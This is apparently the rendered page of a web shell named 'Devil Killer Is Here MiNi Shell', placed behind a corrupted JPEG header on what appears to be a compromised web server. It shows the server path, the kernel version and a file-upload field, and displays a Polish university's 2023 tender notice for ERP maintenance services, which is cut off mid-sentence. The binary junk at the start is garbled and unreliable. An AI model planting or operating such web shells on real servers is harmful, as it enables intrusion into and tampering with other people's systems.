JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230428/0019743501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi opieki serwisowej i aktualizacji oprogramowania <br/>Zintegrowanego Systemu Informatycznego klasy ERP<br/>eksploatowanego przez Politechnikę Morską w Szczecinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Morska w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000145129</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wały Chrobrego 1-2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@pm.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pm.szczecin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi opieki serwisowej i aktualizacji oprogramowania <br/>Zintegrowanego Systemu Informatycznego klasy ERP<br/>eksploatowanego przez Politechnikę Morską w Szczecinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-91db8515-e58f-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00197435</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pm_szczecin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pm_szczecin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W niniejszym postępowaniu<br/>komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy: https://platformazakupowa.pl/pn/pm_szczecin.<br/>2) Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za pośrednictwem Platformy.<br/>Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do zamawiającego przed upływem wymaganego terminu.<br/>3) Dokumenty muszą zostać opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-II/262-1/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest świadczenie usługi opieki serwisowej i aktualizacji oprogramowania Zintegrowanego Systemu Informatycznego klasy ERP eksploatowanego przez Politechnikę Morską w Szczecinie.<br/>2)	Dokładny opis przedmiotu zamówienia określa załącznik nr 1a do SWZ (zadanie nr 1) <br/>3)	Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>4)	Nomenklatura wg CPV:<br/>72611000-6 – Usługi w zakresie wsparcia technicznego<br/>72267000-4 – Usługi w zakresie konserwacji i napraw oprogramowania<br/>72266000-7 – Usługi doradcze w zakresie oprogramowania<br/>72260000-5 - Usługi w zakresie oprogramowania<br/>5)	Podane przez Zamawiającego ewentualne nazwy (znaki towarowe), mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanie ofert równoważnych w zakresie sporządzonego opisu przedmiotu zamówienia.<br/>6)	Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech technicznych <br/>i jakościowych oraz standardów, dla których określenia dopuszcza się wskazanie przykładowych znaków towarowych.<br/>7)	W przypadku, gdy Zamawiający odnosi się w opisie przedmiotu zamówienia do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp, dopuszcza się rozwiązania równoważne opisywanym.<br/>8)	Zamawiający dopuszcza możliwość składania ofert częściowych, tj. na każde z 2 zadań oddzielnie. Zamawiający nie dopuszcza możliwości składania ofert na dowolne wybrane pozycje w zadaniach. <br/>ZADANIE 1 – Świadczenie usługi opieki serwisowej i aktualizacji oprogramowania SIMPLE.ERP, SIMPLE.HCM, XPRIMER.BI, WSO2 ESB wraz z bazami danych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72611000-6 - Usługi w zakresie wsparcia technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72267000-4 - Usługi w zakresie konserwacji i napraw oprogramowania</p> <p class="mb-0">72266000-7 - Usługi doradcze w zakresie oprogramowania</p> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji:<br/>Zamawiający przewiduje możliwość zwiększenia zamówienia na zasadach prawa opcji w zakresie ilości godzin Helpdesk. Zamawiającemu przysługuje prawo do skorzystania z prawa opcji w przypadku wykorzystania limitu godzin Helpdesk świadczenia usług serwisowych objętych Abonamentem w poszczególnych zadaniach. Maksymalnie w ramach prawa opcji Zamawiający może zwiększyć liczbę godzin serwisowych do 30% zamówionych w Abonamencie godzin Helpdesk w każdym zadaniu. Prawo opcji nie stanowi jednak dla Zamawiającego obowiązku, z którego Wykonawcy przysługiwałoby roszczenie wobec Zamawiającego. Wykorzystanie prawa opcji zależy od potrzeb Zamawiającego. Uruchomienie prawa opcji nastąpi w trakcie realizacji umowy dla zamówienia podstawowego. Zamawiający ma prawo, składać wielokrotnie zamówienia na dodatkowe godziny Helpdesk w ramach Prawa opcji do wykorzystania przewidzianej dodatkowej puli liczby godzin HelpDesk w poszczególnym zadaniu. Zamawiający może skorzystać z części godzin Helpdesk przewidzianych prawem opcji. W przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystania jedynie z części Wykonawcy nie przysługuje żadne roszczenie z tego tytułu. Wykonawca winien w ofercie wskazać wysokość stawek według których rozliczane będą wykonane usługi w przypadku skorzystania przez Zamawiającego z prawa opcji. <br/>Wartości prawa opcji nie należy doliczać do ceny oferowanego Abonamentu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej za przekroczenie czasu naprawy dla błędu krytycznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej za przekroczenie czasu naprawy dla błędu ważnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej za przekroczenie czasu naprawy dla błędu normalnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest świadczenie usługi opieki serwisowej i aktualizacji oprogramowania Zintegrowanego Systemu Informatycznego klasy ERP eksploatowanego przez Politechnikę Morską w Szczecinie.<br/>2)	Dokładny opis przedmiotu zamówienia określa załącznik załącznik nr 1b do SWZ (zadanie nr 2).<br/>3)	Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>4)	Nomenklatura wg CPV:<br/>72611000-6 – Usługi w zakresie wsparcia technicznego<br/>72267000-4 – Usługi w zakresie konserwacji i napraw oprogramowania<br/>72266000-7 – Usługi doradcze w zakresie oprogramowania<br/>72260000-5 - Usługi w zakresie oprogramowania<br/>5)	Podane przez Zamawiającego ewentualne nazwy (znaki towarowe), mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanie ofert równoważnych w zakresie sporządzonego opisu przedmiotu zamówienia.<br/>6)	Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech technicznych <br/>i jakościowych oraz standardów, dla których określenia dopuszcza się wskazanie przykładowych znaków towarowych.<br/>7)	W przypadku, gdy Zamawiający odnosi się w opisie przedmiotu zamówienia do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp, dopuszcza się rozwiązania równoważne opisywanym.<br/>8)	Zamawiający dopuszcza możliwość składania ofert częściowych, tj. na każde z 2 zadań oddzielnie. Zamawiający nie dopuszcza możliwości składania ofert na dowolne wybrane pozycje w zadaniach. <br/>ZADANIE 2 – Świadczenie usługi opieki serwisowej i aktualizacji oprogramowania DOCUSAFE wraz z bazą danych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72611000-6 - Usługi w zakresie wsparcia technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72267000-4 - Usługi w zakresie konserwacji i napraw oprogramowania</p> <p class="mb-0">72266000-7 - Usługi doradcze w zakresie oprogramowania</p> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji:<br/>Zamawiający przewiduje możliwość zwiększenia zamówienia na zasadach prawa opcji w zakresie ilości godzin Helpdesk. Zamawiającemu przysługuje prawo do skorzystania z prawa opcji w przypadku wykorzystania limitu godzin Helpdesk świadczenia usług serwisowych objętych Abonamentem w poszczególnych zadaniach. Maksymalnie w ramach prawa opcji Zamawiający może zwiększyć liczbę godzin serwisowych do 30% zamówionych w Abonamencie godzin Helpdesk w każdym zadaniu. Prawo opcji nie stanowi jednak dla Zamawiającego obowiązku, z którego Wykonawcy przysługiwałoby roszczenie wobec Zamawiającego. Wykorzystanie prawa opcji zależy od potrzeb Zamawiającego. Uruchomienie prawa opcji nastąpi w trakcie realizacji umowy dla zamówienia podstawowego. Zamawiający ma prawo, składać wielokrotnie zamówienia na dodatkowe godziny Helpdesk w ramach Prawa opcji do wykorzystania przewidzianej dodatkowej puli liczby godzin HelpDesk w poszczególnym zadaniu. Zamawiający może skorzystać z części godzin Helpdesk przewidzianych prawem opcji. W przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystania jedynie z części Wykonawcy nie przysługuje żadne roszczenie z tego tytułu. Wykonawca winien w ofercie wskazać wysokość stawek według których rozliczane będą wykonane usługi w przypadku skorzystania przez Zamawiającego z prawa opcji. <br/>Wartości prawa opcji nie należy doliczać do ceny oferowanego Abonamentu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej za przekroczenie czasu naprawy dla błędu krytycznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej za przekroczenie czasu naprawy dla błędu ważnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej za przekroczenie czasu naprawy dla błędu normalnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający na podstawie art. 112 ustawy Pzp, określa warunek/warunki udziału w postępowaniu dotyczący/-e:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie. <br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/><br/> Zamawiający nie stawia warunku w tym zakresie. <br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie stawia warunku w tym zakresie. <br/><br/>4)	zdolności technicznej lub zawodowej:<br/>Warunek w rozumieniu Zamawiającego spełni Wykonawca, który: <br/><br/>a)	wykaże się wykonaniem bądź wykonywaniem w okresie ostatnich 5 lat przed upływem terminu składania Ofert, a jeżeli okres działalności jest krótszy – to w tym okresie, co najmniej dwóch usług polegających na opiece nad systemem informatycznym, tj. wprowadzaniu poprawek do systemu i wykonywaniu czynności administracyjnych, przez okres co najmniej 12 miesięcy, w zakresie co najmniej: <br/>Finanse i księgowość, Majątek trwały, Obrót towarowy, Kadry i płace, Raporty i Analizy dla zadania numer 1 <br/>oraz <br/>Elektroniczny Obieg Dokumentów dla zadania numer 2.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, powyższy warunek musi zostać spełniony łącznie przez jednego z wykonawców (nie dopuszcza się łączenia potencjałów Wykonawców występujących wspólnie).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie , z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy.<br/><br/>b) wykaże że będzie dysponował osobami zdolnymi do wykonania Zamówienia. Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji Zamówienia osobami zdolnymi do wykonania Zamówienia, tj. posiadającymi następujące doświadczenie i kwalifikacje:<br/><br/>- Kierownikiem Zespołu serwisu – liczba osób – co najmniej 1, który będzie posiadał co najmniej 2 letnie doświadczenie zawodowe w zakresie kierowania zespołem świadczącym usługi opieki serwisowej dla systemu informatycznego, nabyte poprzez uczestnictwo w ciągu ostatnich 5 lat przed upływem terminu składania Ofert w co najmniej 2 projektach informatycznych opieki serwisowej systemu informatycznego;<br/><br/>- Pracownikami serwisu – co najmniej 2 osoby, posiadające doświadczenie w administrowaniu systemami: <br/>SIMPLE.ERP, XPRIMER.BI, SIMPLE.HCM, WSO2 ESB dla zadnia 1, <br/>DocuSafe dla zadania nr 2 <br/>nabyte poprzez uczestnictwo w ciągu ostatnich 5 lat przed upływem terminu składania Ofert w co najmniej dwóch projektach informatycznych opieki serwisowej systemu informatycznego.<br/>Wzór oświadczenia o spełnieniu warunków udziału w postępowaniu stanowi Załącznik nr 2a do SWZ. <br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, powyższy warunek musi zostać spełniony łącznie przez wszystkich wykonawców (dopuszcza się łączenia potencjałów Wykonawców występujących wspólnie). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie , z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy.<br/><br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby (w zakresie warunku określonego w lit. a) lub b)), jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych<br/><br/><br/>Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień 